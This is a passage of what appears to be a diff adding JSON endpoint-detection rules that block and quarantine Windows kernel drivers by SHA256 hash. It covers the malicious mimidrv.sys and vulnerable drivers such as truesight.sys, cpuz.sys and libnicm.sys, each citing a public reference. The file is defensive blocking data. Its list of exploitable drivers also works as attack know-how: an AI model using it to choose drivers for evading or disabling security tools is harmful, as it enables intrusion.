+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469718Z",
+ "creation_date": "2026-03-23T11:45:30.469721Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469730Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81e0111c823599201e7e7054557017c0ba148dcd6d9fe74052efdee051c42e13",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33c1b769-9fff-50f1-be6b-e085db693f68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454007Z",
+ "creation_date": "2026-03-23T11:45:30.454010Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454019Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9d4e7d594b4b318ac78baa79f119e4c85493eec1c1f939ae10b1633346c6e9e",
+ "comment": "Malicious Kernel Driver (aka a236e7d654cd932b7d11cb604629a2d0.sys) [https://www.loldrivers.io/drivers/2866bd72-a4b1-4764-a838-9ed0790c2631/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33c853f9-12db-5799-bca7-3572f684e31e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471996Z",
+ "creation_date": "2026-03-23T11:45:30.471999Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472008Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff987c30ce822d99f3b4b4e23c61b88955f52406a95e6331570a2a13cbebc498",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33d96035-f971-5ec9-ad33-943750c5fc82",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.496986Z",
+ "creation_date": "2026-03-23T11:45:31.496991Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497466Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c74ab60c598a4ec997f1d8fc232c56fa72394fc5ad3a69e0706aca3511806fc6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33f29a55-a6f1-58c7-ad01-015e4f902143",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476144Z",
+ "creation_date": "2026-03-23T11:45:30.476147Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476157Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8138b219a2b1be2b0be61e5338be470c18ad6975f11119aee3a771d4584ed750",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33f3329e-7d12-5fe1-bc68-b53e0b6d3f6c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146884Z",
+ "creation_date": "2026-03-23T11:45:32.146886Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146892Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "efde1a896c24055780aefb6f1c5fee097b8dffbe79b7e2c26320f6fe7ea3b74d",
+ "comment": "Vulnerable Kernel Driver (aka BioNTdrv.sys) [https://www.loldrivers.io/drivers/e6378671-986d-42a1-8e7a-717117c83751/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33f618e5-03da-56ee-b89c-c272c20d9cf6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458316Z",
+ "creation_date": "2026-03-23T11:45:30.458319Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458328Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "41eeeb0472c7e9c3a7146a2133341cd74dd3f8b5064c9dee2c70e5daa060954f",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34111be1-eea2-5913-bce6-8123f4af66cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474825Z",
+ "creation_date": "2026-03-23T11:45:30.474829Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474837Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4a525f5350be5a82cf4fb3546a914841642cda5deed7f9baa13d2912eed476fb",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "341e0c37-04bd-5a98-99aa-4aaa4f3a67e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820998Z",
+ "creation_date": "2026-03-23T11:45:31.821001Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821009Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aacc20d05f9d0874955364702d8c7e016f151a019f9d289390da7b99f7155c4f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34294bee-e670-5b6e-9011-818c7ff09599",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815401Z",
+ "creation_date": "2026-03-23T11:45:31.815403Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815408Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ced779242a0df8d09e007d83bd896b2b672d157fcc8ebd6e27892c5ce3fb59a5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34336957-e66d-5822-b387-3f02c0544a5f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975570Z",
+ "creation_date": "2026-03-23T11:45:29.975572Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975577Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "343a332a-a065-580d-9e42-99cdb28c7899",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815290Z",
+ "creation_date": "2026-03-23T11:45:31.815292Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815298Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd7f5c0dbc7d8ee58c0b8aa7893b05163f4c242d5e9a117ea03489867d6c5703",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3442e17b-100a-52ef-8cc6-567c57d504d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473940Z",
+ "creation_date": "2026-03-23T11:45:30.473950Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473959Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "affeec7af311ecb53182dc6b28c61057eeb6dbd895f92354310f775cf843cfec",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "346785cb-00bb-5a00-a600-47bce4b3ebb3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611270Z",
+ "creation_date": "2026-03-23T11:45:29.611272Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611277Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b9090296a10225be115810e29e8ada4f70e4d4a8f88b385ccd9a8a6d2eb6778",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3467c84c-d8cb-57f6-b677-6b356750e5d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822618Z",
+ "creation_date": "2026-03-23T11:45:30.822620Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822625Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9acd27f9b7b3075e5d5273ae285de33844aafe0477782ecd4ae573ed282f863a",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3471aae7-852f-52b6-86b3-c9640a2d12c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813451Z",
+ "creation_date": "2026-03-23T11:45:31.813454Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813462Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "90546d46b8a417fc97d51360aa02c4de0f7973d0967ed89dadaa41230bafacd3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "349897d8-44ae-5c5d-bd69-4b5bf73a1e0c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813685Z",
+ "creation_date": "2026-03-23T11:45:31.813687Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813692Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "376fce1d2509f18bc1506a516cec3a9c8ea86a08691173eb3c312e369d6e3514",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "349b51f6-d603-5a7d-bf2a-eb2dbd2dc021",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144545Z",
+ "creation_date": "2026-03-23T11:45:31.144547Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144553Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "99b8638935d89b108073ba90d3cb422aefe1017bf28b1a875728467c78d83adf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34a0c0c4-5b33-5bb5-a7f1-6f939eabefcc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476461Z",
+ "creation_date": "2026-03-23T11:45:30.476464Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476474Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f27febff1be9e89e48a9128e2121c7754d15f8a5b2e88c50102cecee5fe60229",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34a98a07-2883-51ec-8f1f-d4032355e4fd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836559Z",
+ "creation_date": "2026-03-23T11:45:30.836561Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836566Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ccfdd6b8d4fe83b4327e398a9af9ed7df6cb7d79fe5d11423b9e87da1ec51a78",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34b4451f-5ab1-5c5c-9379-a5ec8fd4d20d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145659Z",
+ "creation_date": "2026-03-23T11:45:31.145661Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145667Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82fb3ea70d7762e6f2ce380700d0164c869d233c660e3370057c5b87cd3f70f5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34b967db-db08-5b6f-a277-558c0e50353f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809392Z",
+ "creation_date": "2026-03-23T11:45:31.809395Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809403Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f4c030e7fd706e8b12521c9d2b0547d8d0c529088e45328a79936b922e88124e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34bc5b45-b452-5baf-9307-575551abd473",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971678Z",
+ "creation_date": "2026-03-23T11:45:29.971680Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971685Z",
+ "rule_level": null,
+ "rule_level_override": null,
